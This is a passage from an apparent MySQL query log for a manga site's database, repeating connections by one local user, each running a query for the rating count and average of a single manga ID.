(sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '256' order by created desc 330645286 Quit 330645287 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645287 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330645287 Quit 330645288 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645288 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '114' order by created desc 330645288 Quit 330645289 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645289 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330645289 Quit 330645290 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645290 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '276' order by created desc 330645290 Quit 330645291 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645291 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '320' order by created desc 330645291 Quit 330645292 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645292 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330645292 Quit 330645293 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645293 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330645293 Quit 330645294 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645294 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '277' order by created desc 330645294 Quit 330645295 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645295 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330645295 Quit 330645296 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645296 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '358' order by created desc 330645296 Quit 330645297 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645297 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '188' order by created desc 330645297 Quit 330645298 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645298 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330645298 Quit 330645299 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645299 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '118' order by created desc 330645299 Quit 330645300 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645300 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '262' order by created desc 330645300 Quit 330645301 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645301 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '28' order by created desc 330645301 Quit 330645302 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645302 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '371' order by created desc 330645302 Quit 330645303 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645303 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '281' order by created desc 330645303 Quit 330645304 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645304 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '254' order by created desc 330645304 Quit 330645305 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645305 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '323' order by created desc 330645305 Quit 330645306 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645306 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '328' order by created desc 330645306 Quit 330645307 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645307 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '361' order by created desc 330645307 Quit 330645308 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645308 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330645308 Quit 330645309 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645309 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '347' order by created desc 330645309 Quit 330645310 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645310 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '1' order by created desc 330645310 Quit 330645311 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645311 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '286' order by created desc 330645311 Quit 330645312 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645312 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '255' order by created desc 330645312 Quit 330645313 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645313 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '372' order by created desc 330645313 Quit 330645314 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645314 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '315' order by created desc 330645314 Quit 330645315 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645315 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330645315 Quit 330645316 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645316 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '313' order by created desc 330645316 Quit 330645317 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645317 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '325' order by created desc 330645317 Quit 330645318 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645318 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '260' order by created desc 330645318 Quit 330645319 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645319 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '348' order by created desc 330645319 Quit 330645320 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645320 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330645320 Quit 330645321 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645321 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '319' order by created desc 330645321 Quit 330645322 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645322 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '306' order by created desc 330645322 Quit 330645323 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645323 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '283' order by created desc 330645323 Quit 330645324 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645324 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '355' order by created desc 330645324 Quit 330645325 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645325 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '342' order by created desc 330645325 Quit 330645326 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645326 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '264' order by created desc 330645326 Quit 330645327 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645327 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330645327 Quit 330645328 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645328 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330645328 Quit 330645329 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645329 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '274' order by created desc 330645329 Quit 330645330 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645330 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '329' order by created desc 330645330 Quit 330645331 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645331 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '279' order by created desc 330645331 Quit 330645332 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645332 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '314' order by created desc 330645332 Quit 330645333 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645333 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '332' order by created desc 330645333 Quit 330645334 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645334 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '351' order by created desc 330645334 Quit 330645335 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645335 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330645335 Quit 330645336 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645336 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '343' order by created desc 330645336 Quit 330645337 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645337 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '310' order by created desc 330645337 Quit 330645338 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645338 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '356' order by created desc 330645338 Quit 330645339 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645339 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '301' order by created desc 330645339 Quit 330645340 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645340 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330645340 Quit 330645341 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645341 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '300' order by created desc 330645341 Quit 330645342 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645342 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '263' order by created desc 330645342 Quit 330645343 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645343 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '318' order by created desc 330645343 Quit 330645344 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645344 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '317' order by created desc 330645344 Quit 330645345 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645345 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '382' order by created desc 330645345 Quit 330645346 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645346 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '295' order by created desc 330645346 Quit 330645347 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645347 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '373' order by created desc 330645347 Quit 330645348 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645348 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330645348 Quit 330645349 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645349 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '247' order by created desc 330645349 Quit 330645350 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645350 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '337' order by created desc 330645350 Quit 330645351 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645351 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '299' order by created desc 330645351 Quit 330645352 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645352 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '335' order by created desc 330645352 Quit 330645353 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645353 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '90' order by created desc 330645353 Quit 330645354 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645354 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '265' order by created desc 330645354 Quit 330645355 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645355 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '258' order by created desc 330645355 Quit 330645356 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645356 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '380' order by created desc 330645356 Quit 330645357 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645357 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '334' order by created desc 330645357 Quit 330645358 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645358 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '336' order by created desc 330645358 Quit 330645359 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645359 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '304' order by created desc 330645359 Quit 330645360 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645360 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '297' order by created desc 330645360 Quit 330645361 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645361 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '340' order by created desc 330645361 Quit 330645362 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645362 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '341' order by created desc 330645362 Quit 330645363 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645363 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '374' order by created desc 330645363 Quit 330645364 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645364 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '367' order by created desc 330645364 Quit 330645365 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645365 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '344' order by created desc 330645365 Quit 330645366 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645366 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '352' order by created desc 330645366 Quit 330645367 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645367 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '357' order by created desc 330645367 Quit 330645368 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645368 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '354' order by created desc 330645368 Quit 330645369 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645369 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '386' order by created desc 330645369 Quit 330645370 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645370 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '333' order by created desc 330645370 Quit 330645371 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645371 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '353' order by created desc 330645371 Quit 330645372 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645372 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '350' order by created desc 330645372 Quit 330645373 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645373 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '376' order by created desc 330645373 Quit 330645374 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645374 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '381' order by created desc 330645374 Quit 330645375 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645375 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '346' order by created desc 330645375 Quit 330645376 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645376 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '309' order by created desc 330645376 Quit 330645377 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645377 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '316' order by created desc 330645377 Quit 330645378 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645378 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '384' order by created desc 330645378 Quit 330645379 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645379 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '291' order by created desc 330645379 Quit 330645380 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645380 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '359' order by created desc 330645380 Quit 330645381 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645381 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '377' order by created desc 330645381 Quit 330645382 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645382 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '378' order by created desc 330645382 Quit 330645383 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645383 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '282' order by created desc 330645383 Quit 330645384 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645384 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '345' order by created desc 330645384 Quit 330645385 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645385 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330645385 Quit 330645386 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645386 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '360' order by created desc 330645386 Quit 330645387 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645387 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '383' order by created desc 330645387 Quit 330645388 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645388 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '375' order by created desc 330645388 Quit 330645389 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645389 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '305' order by created desc 330645389 Quit 330645390 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645390 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '385' order by created desc 330645390 Quit 330645391 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645391 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '369' order by created desc 330645391 Quit 330645392 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645392 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '387' order by created desc 330645392 Quit 330645393 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645393 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '362' order by created desc 330645393 Quit 330645394 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645394 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '388' order by created desc 330645394 Quit 330645395 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645395 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '364' order by created desc 330645395 Quit 330645396 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645396 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '389' order by created desc 330645396 Quit 330645397 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645397 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '365' order by created desc 330645397 Quit 330645398 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645398 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '379' order by created desc 330645398 Quit 330645399 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645399 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '370' order by created desc 330645399 Quit 330645400 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645400 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '390' order by created desc 330645400 Quit 330645401 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645401 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '385' order by created desc 330645401 Quit 330645402 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645402 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '358' order by created desc 330645402 Quit 330645403 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645403 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '356' order by created desc 330645403 Quit 330645404 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645404 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '352' order by created desc 330645404 Quit 330645405 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645405 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '344' order by created desc 330645405 Quit 330645406 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645406 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '343' order by created desc 330645406 Quit 330645407 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645407 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '342' order by created desc 330645407 Quit 330645408 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645408 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '339' order by created desc 330645408 Quit 330645409 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645409 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '329' order by created desc 330645409 Quit 330645410 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645410 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '324' order by created desc 330645410 Quit 330645411 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645411 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '320' order by created desc 330645411 Quit 330645412 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645412 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '318' order by created desc 330645412 Quit 330645413 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645413 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '315' order by created desc 330645413 Quit 330645414 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645414 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '313' order by created desc 330645414 Quit 330645415 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645415 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '308' order by created desc 330645415 Quit 330645416 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645416 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330645416 Quit 330645417 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645417 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330645417 Quit 330645418 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645418 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330645418 Quit 330645419 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645419 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330645419 Quit 330645420 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645420 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330645420 Quit 330645421 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645421 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330645421 Quit 330645422 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645422 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330645422 Quit 330645423 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645423 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330645423 Quit 330645424 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645424 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330645424 Quit 330645425 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645425 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330645425 Quit 330645426 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645426 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330645426 Quit 330645427 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645427 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330645427 Quit 330645428 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645428 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330645428 Quit 330645429 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645429 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330645429 Quit 330645430 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645430 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330645430 Quit 330645431 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645431 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330645431 Quit 330645432 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645432 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330645432 Quit 330645433 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645433 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330645433 Quit 330645434 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645434 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330645434 Quit 330645435 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645435 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330645435 Quit 330645436 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645436 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330645436 Quit 330645437 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645437 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330645437 Quit 330645438 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645438 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330645438 Quit 330645439 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645439 Query select count(id) as total_rating, 